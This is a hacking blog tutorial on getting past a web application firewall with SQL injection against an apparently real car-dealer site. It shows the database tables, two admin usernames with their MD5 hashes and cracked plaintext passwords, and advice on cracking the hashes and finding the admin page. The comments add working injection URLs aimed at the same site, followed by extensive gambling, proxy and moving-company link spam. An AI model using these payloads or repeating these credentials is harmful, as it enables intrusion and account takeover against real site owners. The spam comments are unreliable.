Video Demonstartion
Hello Security Explorers , Welcome to Security Explored
This is the next tutorial in Sql Injection Series.
WAF Bypassing Through Sql Injection.
WAF stands for Web Application Firewall.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
Now We are Moving A step Forward in Sql Injection , Advanced SQL injection.
In this Tutorial , I hope that u know basic sql injection .
If don’t then you should read my recent tutorial With a video demonstration.
Read This tutorial first .
Now I have sql vulnerable site with WAF enabled.
To check for vulnerability ,
It shows an error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1”
Means it is vulnerable.
Now to find number of columns,
Means there are only 7 columns in the database.
Now the real thing starts,
Now to find vulnerable columns ,
On loading this URL we get this error
Not Acceptable
An appropriate representation of the requested resource /faq2.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
This error is due to WAF , WAF is not allowing us to enter a malicious query ,it is blocking it .
Now to bypass WAF, we are going to use SQL inline comments like “ / ” , “ * ” , “ ! ”.
We have to apply these comments on that things on which we want the server to focuss.
Now to bypass WAF and get vulnerable columns,we modify the syntax ,
Here you se we get all vulnerable columns.
Vulnerable columns are – 2,3,4,5,6
We are going to inject in these columns
You have noticed that I have used a sequence of capital and small alphabets in “union all select” ,Using this helps in WAF bypass.
Now to get MYSQL database version and current database .
You can get mysql version and current database at the same time by this
Next thing you all know to get Table names, for this,
We get these tables - 9791614_offers,C1on33_offers,apr,faq,newsletter,users
As I want to extract admin username and password, so I will use “users” table
In some sites you have to provide more inline comments to get table and columns names like,
/*!table_name*/ focuses on the query table_name and give efficient results.
To get columns
Again in some site this will show a “Non Acceptable error” So you have to add more inline comments and your URL will be,
You will get these columns - id,headline,offer,price,contact,id,headline,offer,price,contact,apr,updated,id,title,p1,p2,p3,p4,updated,id,email,name,surname,address,phone,curr_car,year,id,username,password,email
Again I need username and password ,So the columns I am going to dump are “username” , ”password”
To dump them ,
Here we got this
SeanMcB:be5f032a39040e000b0cc2bf0887d496,Clon33M:83d385aa20740f16ca7fee506e37fc48
Here you see we have two admins
Here Username are SeanMcB and Clon33M
be5f032a39040e000b0cc2bf0887d496 and 83d385aa20740f16ca7fee506e37fc48
are md5 hash of the password , you need to decrypt them .
To decrypt them go to http://www.md5decrypter.co.uk
Paste your md5 hash their , enter the captcha code and click on decrypt hash .
The plain text of
be5f032a39040e000b0cc2bf0887d496 is rZ23MHq
and of 83d385aa20740f16ca7fee506e37fc48 is Clon33
You get usernames and passwords
Now next thing is to find admin page
Again I will prefer you Havij to find admin pages .
Here in this cases admin page is
If you have any problem or any query then feel free to contact me at cyberdash@live.in
Or contact me at http://www.facebook.com/cyberdash
good,thanks
ReplyDeleteI tested it ,
ReplyDeletehttp://cloneemotorcentre.ie/faq2.php?id=-15/**/uNiOn/**/SelEct/**/1,2,3,4,5,6,7--
can by pass it ....
@独自等待 yup you can bypass it ......u just need to provide inline comments in the syntax to bypass WAF
ReplyDeletehi friends i have a hacking blogs for more tips and tricks
ReplyDeletewww.indianhackersblog.blogspot.co.uk
we can just change a letter to capital for http://cloneemotorcentre.ie/faq2.php?id=-15%20uniOn%20all%20seLect%201,2,3,4,5,6,7--
ReplyDeleteI can't log in with admin's information. The site always says "Unknown column '83d385aa20740f16ca7fee506e37fc48' in 'where clause'"
ReplyDeleteorder by is not working
ReplyDeleteafter i skiped and try to go for union select its also not working
Smm panel
ReplyDeletesmm panel
https://isilanlariblog.com/
İNSTAGRAM TAKİPÇİ SATIN AL
hirdavatciburada.com
beyazesyateknikservisi.com.tr
SERVİS
tiktok jeton hilesi indir
Good content. You write beautiful things.
ReplyDeletemrbahis
mrbahis
hacklink
vbet
hacklink
sportsbet
korsan taksi
sportsbet
vbet
Good text Write good content success. Thank you
ReplyDeletekralbet
poker siteleri
bonus veren siteler
slot siteleri
betmatik
kibris bahis siteleri
tipobet
mobil ödeme bahis
dijital kartvizit
ReplyDeletereferans kimliği nedir
binance referans kodu
referans kimliği nedir
bitcoin nasıl alınır
resimli magnet
BOYQ3İ
hatay
ReplyDeletekars
mardin
samsun
urfa
A21
muş
ReplyDeleteniğde
tunceli
aydın
amasya
07547W
https://saglamproxy.com
ReplyDeletemetin2 proxy
proxy satın al
knight online proxy
mobil proxy satın al
UEL0EC
https://istanbulolala.biz/
ReplyDeleteDGXO
düzce evden eve nakliyat
ReplyDeletedenizli evden eve nakliyat
kırşehir evden eve nakliyat
çorum evden eve nakliyat
afyon evden eve nakliyat
DRM23A
urfa evden eve nakliyat
ReplyDeletemalatya evden eve nakliyat
burdur evden eve nakliyat
kırıkkale evden eve nakliyat
kars evden eve nakliyat
8PBHM
7B977
ReplyDeleteÇorum Parça Eşya Taşıma
Bitlis Parça Eşya Taşıma
Denizli Parça Eşya Taşıma
Antalya Şehir İçi Nakliyat
Muş Şehirler Arası Nakliyat
Diyarbakır Şehirler Arası Nakliyat
İstanbul Şehirler Arası Nakliyat
deca durabolin for sale
Kırıkkale Şehir İçi Nakliyat
E082A
ReplyDeleteAksaray Şehirler Arası Nakliyat
Gümüşhane Şehir İçi Nakliyat
Lovely Coin Hangi Borsada
Afyon Şehirler Arası Nakliyat
Meta Coin Hangi Borsada
Dxy Coin Hangi Borsada
Tunceli Şehir İçi Nakliyat
Çankaya Fayans Ustası
Bingöl Lojistik
E6D65
ReplyDeleteYenimahalle Fayans Ustası
Sinop Şehirler Arası Nakliyat
Çerkezköy Bulaşık Makinesi Tamircisi
Batıkent Boya Ustası
Bartın Evden Eve Nakliyat
Uşak Lojistik
Nevşehir Parça Eşya Taşıma
Giresun Evden Eve Nakliyat
Siirt Evden Eve Nakliyat
BE4CA
ReplyDeleteŞırnak Şehirler Arası Nakliyat
Kocaeli Şehirler Arası Nakliyat
Ünye Oto Lastik
Çankaya Boya Ustası
Aydın Parça Eşya Taşıma
Denizli Parça Eşya Taşıma
Düzce Evden Eve Nakliyat
Kırıkkale Parça Eşya Taşıma
Manisa Lojistik
80816
ReplyDeleteHakkari Şehirler Arası Nakliyat
Bolu Evden Eve Nakliyat
Antalya Lojistik
Urfa Parça Eşya Taşıma
Rize Şehirler Arası Nakliyat
Adıyaman Şehirler Arası Nakliyat
Kayseri Evden Eve Nakliyat
Bayburt Şehirler Arası Nakliyat
Van Parça Eşya Taşıma
6944B
ReplyDeleteCoin Madenciliği Nasıl Yapılır
Binance Nasıl Üye Olunur
Binance Hangi Ülkenin
Coin Nasıl Üretilir
Kripto Para Üretme
Bitcoin Üretme Siteleri
Binance Neden Tercih Edilir
Bitcoin Yatırımı Nasıl Yapılır
Bitcoin Nasıl Kazılır
97CDB
ReplyDeletebinance ne demek
canli sohbet
filtre kağıdı
binance
okex
canlı sohbet ucretsiz
kripto para nereden alınır
btcturk
bingx
62839
ReplyDelete----
matadorbet
----
----
----
----
----
----
----
bnhjk;'hbhgf
ReplyDeleteصيانة افران جدة
شركة تنظيف بخميس مشيط cQrrKmYrif
ReplyDelete